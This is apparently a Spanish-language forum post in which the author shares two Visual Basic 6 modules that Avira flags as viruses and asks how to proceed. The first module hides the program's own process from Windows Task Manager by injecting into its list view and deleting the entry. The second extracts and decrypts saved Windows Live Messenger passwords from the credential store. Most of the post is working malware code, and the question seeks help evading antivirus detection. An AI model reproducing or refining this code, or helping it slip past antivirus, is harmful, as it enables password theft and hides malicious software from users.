:3
el avira me detecta 2 modulos como viricos,
este es para ocultar el proceso del admin de tareas
Código
Option Explicit Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long Public Declare Function EnumChildWindows Lib "user32" (ByVal hWndParent As Long, ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long Public Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Public Declare Function SetTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) As Long Public Declare Function KillTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long Const PROCESS_VM_OPERATION = &H8 Const PROCESS_VM_READ = &H10 Const PROCESS_VM_WRITE = &H20 Const PROCESS_ALL_ACCESS = 0 Private Const PAGE_READWRITE = &H4& Const MEM_COMMIT = &H1000 Const MEM_RESERVE = &H2000 Const MEM_DECOMMIT = &H4000 Const MEM_RELEASE = &H8000 Const MEM_FREE = &H10000 Const MEM_PRIVATE = &H20000 Const MEM_MAPPED = &H40000 Const MEM_TOP_DOWN = &H100000 Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private Const LVM_FIRST = &H1000 Private Const LVM_GETTITEMCOUNT& = (LVM_FIRST + 4) Private Const LVM_GETITEMW = (LVM_FIRST + 75) Private Const LVIF_TEXT = &H1 Private Const LVM_DELETEITEM = 4104 Public Type LV_ITEM mask As Long iItem As Long iSubItem As Long State As Long stateMask As Long lpszText As Long 'LPCSTR cchTextMax As Long iImage As Long lParam As Long iIndent As Long End Type Type LV_TEXT sItemText As String * 80 End Type Public Function Procesos(ByVal hWnd2 As Long, lParam As String) As Boolean Dim Nombre As String * 255, nombreClase As String * 255 Dim Nombre2 As String, nombreClase2 As String Dim X As Long, Y As Long X = GetWindowText(hWnd2, Nombre, 255) Y = GetClassName(hWnd2, nombreClase, 255) Nombre = Left(Nombre, X) nombreClase = Left(nombreClase, Y) Nombre2 = Trim(Nombre) nombreClase2 = Trim(nombreClase) If nombreClase2 = "SysListView32" And Nombre2 = "Procesos" Then OcultarItems (hWnd2) Exit Function End If If Nombre2 = "" And nombreClase2 = "" Then Procesos = False Else Procesos = True End If End Function Private Function OcultarItems(ByVal hListView As Long) ' As Variant Dim pid As Long, tid As Long Dim hProceso As Long, nElem As Long, lEscribiendo As Long, i As Long Dim DirMemComp As Long, dwTam As Long Dim DirMemComp2 As Long Dim sLVItems() As String Dim li As LV_ITEM Dim lt As LV_TEXT If hListView = 0 Then Exit Function tid = GetWindowThreadProcessId(hListView, pid) nElem = SendMessage(hListView, LVM_GETTITEMCOUNT, 0, 0&) If nElem = 0 Then Exit Function ReDim sLVItems(nElem - 1) li.cchTextMax = 80 dwTam = Len(li) DirMemComp = GetMemComp(pid, dwTam, hProceso) DirMemComp2 = GetMemComp(pid, LenB(lt), hProceso) For i = 0 To nElem - 1 li.lpszText = DirMemComp2 li.cchTextMax = 80 li.iItem = i li.mask = LVIF_TEXT WriteProcessMemory hProceso, ByVal DirMemComp, li, dwTam, lEscribiendo lt.sItemText = Space(80) WriteProcessMemory hProceso, ByVal DirMemComp2, lt, LenB(lt), lEscribiendo Call SendMessage(hListView, LVM_GETITEMW, 0, ByVal DirMemComp) Call ReadProcessMemory(hProceso, ByVal DirMemComp2, lt, LenB(lt), lEscribiendo) If TrimNull(StrConv(lt.sItemText, vbFromUnicode)) = App.EXEName & ".exe" Then '<===========CAMBIAR Call SendMessage(hListView, LVM_DELETEITEM, i, 0) Exit Function End If Next i CloseMemComp hProceso, DirMemComp, dwTam CloseMemComp hProceso, DirMemComp2, LenB(lt) End Function Private Function GetMemComp(ByVal pid As Long, ByVal memTam As Long, hProceso As Long) As Long hProceso = OpenProcess(PROCESS_VM_OPERATION Or PROCESS_VM_READ Or PROCESS_VM_WRITE, False, pid) GetMemComp = VirtualAllocEx(ByVal hProceso, ByVal 0&, ByVal memTam, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE) End Function Private Sub CloseMemComp(ByVal hProceso As Long, ByVal DirMem As Long, ByVal memTam As Long) Call VirtualFreeEx(hProceso, ByVal DirMem, memTam, MEM_RELEASE) CloseHandle hProceso End Sub Private Function TrimNull(sInput As String) As String Dim pos As Integer pos = InStr(sInput, Chr$(0)) If pos Then TrimNull = Left$(sInput, pos - 1) Exit Function End If TrimNull = sInput End Function Sub TimerProc(ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) Dim Handle As Long Handle = FindWindow(vbNullString, "Administrador de tareas de Windows") If Handle <> 0 Then EnumChildWindows Handle, AddressOf Procesos, 1 End Sub Public Sub Ocultar(ByVal hwnd As Long) App.TaskVisible = False SetTimer hwnd, 0, 20, AddressOf TimerProc End Sub Public Sub Mostrar(ByVal hwnd As Long) App.TaskVisible = True KillTimer hwnd, 0 End Sub
y este es para obtener las contraseñas del msn guardadas
Código
Option Explicit '--------------------------------------------------------------------------------------- ' Module : mMessengerPass ' DateTime : 23/09/2008 11:24 ' Author : Cobein ' Mail : cobein27@hotmail.com ' WebPage : http://www.advance.com.ar ' Purpose : Read WLM (>= 8.0) pass ' Usage : At your own risk ' Requirements: None ' Distribution: You can freely use this code in your own ' applications, but you may not reproduce ' or publish this code on any web site, ' online service, or distribute as source ' on any media without express permission. ' ' Reference : No idea about the original author, It was a french guy tho ' ' History : 23/09/2008 First Cut.................................................... '--------------------------------------------------------------------------------------- Private Declare Function LocalFree Lib "kernel32.dll" (ByVal hMem As Long) As Long Private Declare Function LocalAlloc Lib "kernel32.dll" (ByVal wFlags As Long, ByVal wBytes As Long) As Long Private Declare Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" (ByRef Destination As Any, ByRef Source As Any, ByVal Length As Long) Private Declare Function CredEnumerate Lib "ADVAPI32.dll" Alias "CredEnumerateW" (ByVal lpszFilter As Long, ByVal lFlags As Long, ByRef pCount As Long, ByRef lppCredentials As Long) As Long Private Declare Function CredFree Lib "ADVAPI32.dll" (ByVal pBuffer As Long) As Long Private Declare Function CryptUnprotectData Lib "crypt32.dll" (ByRef pDataIn As DATA_BLOB, ByVal ppszDataDescr As Long, ByVal pOptionalEntropy As Long, ByVal pvReserved As Long, ByVal pPromptStruct As Long, ByVal dwFlags As Long, ByRef pDataOut As DATA_BLOB) As Long Private Declare Function SysAllocString Lib "oleaut32.dll" (ByVal pOlechar As Long) As String Private Declare Function GetVersionEx Lib "kernel32.dll" Alias "GetVersionExA" (ByRef lpVersionInformation As OSVERSIONINFO) As Long Private Type CREDENTIAL dwFlags As Long dwType As Long lpstrTargetName As Long lpstrComment As Long ftLastWritten As Double dwCredentialBlobSize As Long lpbCredentialBlob As Long dwPersist As Long dwAttributeCount As Long lpAttributes As Long lpstrTargetAlias As Long lpUserName As Long End Type Private Type DATA_BLOB cbData As Long pbData As Long End Type Private Type OSVERSIONINFO dwOSVersionInfoSize As Long dwMajorVersion As Long dwMinorVersion As Long dwBuildNumber As Long dwPlatformId As Long szCSDVersion As String * 128 End Type Public Function EnumWLMAccounts() As String Dim lMem As Long Dim i As Long Dim lCount As Long Dim lCred As Long Dim ub As Long Dim lPtr As Long Dim tCred As CREDENTIAL Dim tBlobOut As DATA_BLOB Dim tBlobIn As DATA_BLOB Dim sPass As String Dim vData As Variant Dim tOSV As OSVERSIONINFO With tOSV .dwOSVersionInfoSize = Len(tOSV) Call GetVersionEx(tOSV) If Not .dwMajorVersion + .dwMinorVersion / 10 >= 5.1 Then Exit Function End If End With lMem = LocalAlloc(&H40, 38) vData = Array( _ &H57, &H69, &H6E, &H64, &H6F, &H77, &H73, &H4C, &H69, _ &H76, &H65, &H3A, &H6E, &H61, &H6D, &H65, &H3D, &H2A) For i = 0 To 17 Call CopyMemory(ByVal lMem + (i * 2), CLng(vData(i)), &H1) Next Call CredEnumerate(lMem, 0, lCount, lCred) If lCount Then For i = ub To ub + lCount - 1 Call CopyMemory(ByVal VarPtr(lPtr), ByVal lCred + (i - ub) * 4, &H4) Call CopyMemory(ByVal VarPtr(tCred), ByVal lPtr, &H34) With tBlobIn .pbData = tCred.lpbCredentialBlob .cbData = tCred.dwCredentialBlobSize Call CryptUnprotectData(tBlobIn, 0&, 0&, 0&, 0&, 1&, tBlobOut) sPass = Space(.cbData \ 2) Call CopyMemory(ByVal StrPtr(sPass), ByVal .pbData, .cbData) End With EnumWLMAccounts = EnumWLMAccounts & vbCrLf & vbCrLf & String(50, "-") & vbCrLf EnumWLMAccounts = EnumWLMAccounts & "Protocolo: " & StrConv(SysAllocString(tCred.lpstrTargetName), vbFromUnicode) & vbCrLf EnumWLMAccounts = EnumWLMAccounts & "Cuenta: " & StrConv(SysAllocString(tCred.lpUserName), vbFromUnicode) & vbCrLf EnumWLMAccounts = EnumWLMAccounts & "Contraseña: " & sPass & vbCrLf EnumWLMAccounts = EnumWLMAccounts & String(50, "-") & vbCrLf Next ub = ub + lCount End If Call CredFree(lCred) Call LocalFree(lMem) End Function
la verdad nose que hay que hacer,
osea es como q estoy en el desierto sin brujula y tengo q ir al norte (en este desierto no hay sol xd) (?
que tengo que hacer?